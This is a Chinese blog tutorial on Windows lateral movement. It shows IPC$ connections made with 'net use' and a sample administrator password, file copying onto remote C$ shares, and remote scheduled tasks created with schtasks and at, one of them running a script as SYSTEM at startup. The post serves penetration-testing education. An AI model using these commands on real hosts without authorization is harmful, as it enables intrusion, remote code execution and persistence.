横向传递之IPC+计划任务

最新推荐文章于 2023-02-07 18:33:05 发布
最新推荐文章于 2023-02-07 18:33:05 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全 ipc 渗透测试 内网测试 横传传递
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/122388640
版权
本文详细介绍了渗透测试中如何利用IPC$(InternetProcessConnection)进行进程间通信,通过netuse命令建立链接,并展示了诸如查看目录、复制文件、执行命令等操作。此外,还涵盖了在域中使用IPC、计划任务创建与删除等实用技巧。
摘要由CSDN通过智能技术生成
简介

渗透测试过程中可能会、IPC链接进行横向传递,IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以在远程计算机开启139或445端口时,通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

IPC操作

建立ipc链接

net use \\IP\IPC$ 密码 /user:用户名

net use \\192.168.220.160\IPC$ !@#QAZwsx123 /user:administrator

在这里插入图片描述

在域中使用IPC的时候

net use \\10.10.3.6\ipc$ "QWEasd1234" /user:域名\用户名

建立链接之后,即可执行命令

查看目录

dir \\192.168.220.160\c$

在这里插入图片描述

将文件copy到远程主机

copy c:\1.txt \\192.168.220.160\C$\windows\temp

在这里插入图片描述下面的命令可以查看对应的文件内容

type \\192.168.220.160\C$\windows\temp\1.txt

查看远程系统的进程

tasklist  \\192.168.220.160
计划任务
schtasks

查看远程系统时间

net time \\192.168.220.160

在这里插入图片描述

schtasks命令,使用以下命令可以远程创建系统任务.

schtasks  /create /s 192.168.220.160 /u  administrator /p !@#QAZwsx123  /tn  testschtask /tr C:\windows\temp\1.ps1 /sc  DAILY /st  21:25:00

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-krnBEmXx-1641657321853)(0C13A73010324E8AB6BE94BFB2360142)]

可以按照以下方式,一步一步看懂命令的内容,以及你想要的内容

schtasks /?
schtasks /create /?

另外一种方式

schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\dayu.txt /ru system /f  

schtasks /run /s 192.168.52.138 /i /tn "test"

删除计划任务

schtasks /delete /s 192.168.52.138 /tn "test" -f
at

at命令基础

at id号                          //开启已注册的某个计划任务
at /delete                       //停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete                   //停止某个已注册的计划任务
at \\ip time 程序名批处理         //在某时间运行对方某程序并重新启动计算机  shutdown /r 存到批处理文件

远程创建计划任务

at \\10.10.3.6 14:51 C:\dayu.txt

创建计划任务时会出现ID的,删除时删除对应ID计划任务即可。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YiIIMmZu-1641657321854)(1D2B76ACE58D403D821F6F114DB12931)]

at \\192.168.220.146 id号 /delete

参考

https://www.cnblogs.com/-mo-/p/11813608.html
https://www.cnblogs.com/Drunkmars/p/mar29.html
https://www.cnblogs.com/pt007/p/11857274.html
https://www.freebuf.com/articles/web/270238.html

https://www.freebuf.com/vuls/257477.html
https://blog.csdn.net/flyingleo1981/article/details/18763229

烟雨醉沉浮
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网学习笔记】19、IPC计划任务
TeamsSix 的 CSDN 空间
08-03 326
0、前言 在多层代理的环境中,由于网络限制,通常采用命令行的方式连接主机,这里学习下 IPC 建立会话与配置计划任务的相关点。 1、IPC IPC (Internet Process Connection) 是为了实现进程间通信而开放的命名管道,当目标开启了 IPC$ 文件共享并得到用户账号密码后,就可以使用 IPC 建立连接,获取权限。 建立 IPC 连接: net use \\192.168.7.107\ipc$ "1qaz@WSX" /user:administrator 输入 net use 可以
横向远程命令执行——Windows计划任务
SheXinK’s Blog
12-29 2216
横向远程命令执行——at、schtasks计划任务1、 测试环境2、 计划任务利用2.1 at2.2 schtasks   Windows任务计划程序可以让计算机按照我们的要求在指定时间执行指定的程序,并且可以设置时间间隔重复执行。利用“任务计划”,可以将任何脚本、程序或文档安排在某个最方便的时间运行。 1、 测试环境   Win7:192.168.11.137   Server2008:192....
内网安全-横向移动】IPC$连接--->计划任务--->上线
最新发布
02-07 8824
横向移动-IPC$连接】at&schtasks创建定时任务上线
内网横向移动之IPC
shy的博客
11-11 1902
一,IPC IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。 二,ipc$与空连接,139,445端口,默认共享的关系 1,ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口
远程和计划任务管理
dingshun129的博客
09-13 263
目录 一、程序和进程的关系 1、程序 2、进程 3、线程 二、查看进程信息 1、PS 2、长格式显示进程 三、查看进程信息 1、pgrep 2、pstree 四、进程的启动方式 1、手动启动 2、调度启动 五、进程的前后台调度 1、Ctrl+Z组合键 2、jobs命令 3、fg命令 六、终止进程的运行 1、Ctrl+C 2、kill、killall命令 3、pkill 七:计划任务管理 1、at命令 2、crontab命令 3、crontab任务配置的格式.
内网渗透_IPC
qq_42383069的博客
04-07 5204
内网渗透_IPC 0x01. 什么是IPC IPC(共享命名管道资源)其实就是为了实现进程间通信而开放的命名管道;IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使用 简单理解:可以访问目标机器上的文件(上传、下载),也可以在目标标机器上运行命令 上传和下载文件直接通过 copy 命令就可以,不过路径缓存 UNC 路径 什么是UNC路径?就是以 \ 开头的路径就是UNC路径,比如:\\10.10.10.10\c$\users 0x02. IPC的利用条件 开启了1
ScheduleRunner - A C# 工具,可更灵活地自定义计划任务,以实现操作中的持久和横向***巴拉巴拉
04-06
计划任务工具。懂的都懂,会用的都会用,不会用的也不会用。我已经对其中的一些进行了研究,但是它们在定制计划任务方面都有自己的限制。因此,这个项目旨在提供一个 c # 工具来包含我想要的特性,并在定制计划任务...
带缩略图可全屏横向Flash+xml+js图
01-23
【标题】"带缩略图可全屏横向Flash+xml+js图" 描述了一种网页设计技术,这种技术主要用于创建具有动态效果的图像展示。它结合了Flash、XML(Extensible Markup Language)和JavaScript,以实现高效且互动的图片浏览...
d3+jQuery横向树图demo.zip
04-28
【标题】"d3+jQuery横向树图demo.zip" 是一个使用D3.js库和jQuery技术构建的示例项目,其主要目标是展示如何在横向布局中创建一个交互式的树状图。D3.js(Data-Driven Documents)是Mike Bostock开发的一个强大的...
C# GD+的横向柱状图
06-28
本文将详细讲解如何利用GDI+(Graphics Device Interface Plus)库来创建横向柱状图,以及从竖向柱状图转换为横向的过程。 GDI+是.NET Framework的一部分,它提供了一系列API,使得开发者可以进行低级别的图形绘制...
d3+jQuery横向树图.zip
05-06
标题 "d3+jQuery横向树图.zip" 涉及的主要技术是数据可视化中的D3.js库和jQuery,用于创建一种特殊的树状图——横向树图。这种图表在展示复杂层级关系时非常有效,尤其适合有限的空间展示大量数据。下面我们将深入...
window定时自动关机脚本及问题解决【AT指令和SCHTASKS指令两种方式】
热门推荐
inkflow的博客
06-14 1万+
window定时自动关机脚本 .bat批处理脚本 批处理介绍(batch) 批处理(Batch),也称为批处理脚本。它是对某对象进行批量的处理,通常被认为是一种简化的脚本语言,应用于DOS和Windows系统中。批处理文件的扩展名为bat。 新建批处理脚本 右键新建一个txt文本文件,写入命令语句,保存为.bat格式的文件,即可成功创建批处理脚本。 Shutdown指令 windows系统,在命令...
Windows使用dos命令建立ipc$连接并远程拷贝文件
qq_29550537的博客
04-18 6187
使用dos命令建立 ipc$通道连接,并向远程主机发送文件 关于ipc$连接请查考:https://baike.baidu.com/item/空连接/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24 1.建立ipc$连接 net use \\192.168.1.5\ipc$ "password" /user:"Administra...
基于IPC$的横向移动
good good study
11-12 3409
IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息,还能运行其他其他命令。 IPC$的利用条件 开启了139、445端口。IP
Android中的IPC方式——共享文件
MitSuiTachi的博客
03-19 2769
不同进程之间也可以通过读写相同的文件来实现跨进程通信,例如进程A将数据写入文件,进程B通过读取这个文件来获取数据。由于Android系统是继续Linux开发,不同于Windows,Linux无法通过对文件添加排斥锁的方式来解决并发读写的问题,因此在使用共享文件进行跨进程通信时,需要注意潜在的并发读写问题。尽管如此,通过共享文件来进行进程间通信依然是个不错的方式,因为Java已经为我们提供了完备的类库来实现将基本数据类型和对象序列化到文件系统中,并从文件系统中恢复它们。 同之前一样,我们还是通过写一个小De
TCP/IP协议传输文件
止战之伤的专栏
04-10 849
主要是复习socket通信过程,
远程服务器任务,远程大批量操作windows服务器的计划任务
weixin_29638987的博客
07-30 455
在工作过程中,经常需要大批量对某一批次机器进行计划任务设置,可以通过组策略实现,也可以通过脚本操作。本文演示如何通过powershell脚本远程大批量给若干台机器设置周期重启的操作。#生成10到30的数组$a=(10..30);#初始化空的数组$pcname=@();#给数组赋值$a | %{$pc = "shoa"+ $_; $pcname += "$pc"; };$pcname | %{$co...
Windows计划任务横向移动技术详解
利用 Windows 计划任务进行横向移动是攻击者常用的手段之一。只要满足三个前提条件,攻击者可以使用 at 命令或 schtasks 命令来创建计划任务,进而控制更多的系统和资源。因此,管理员需要加强系统的安全性,限制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值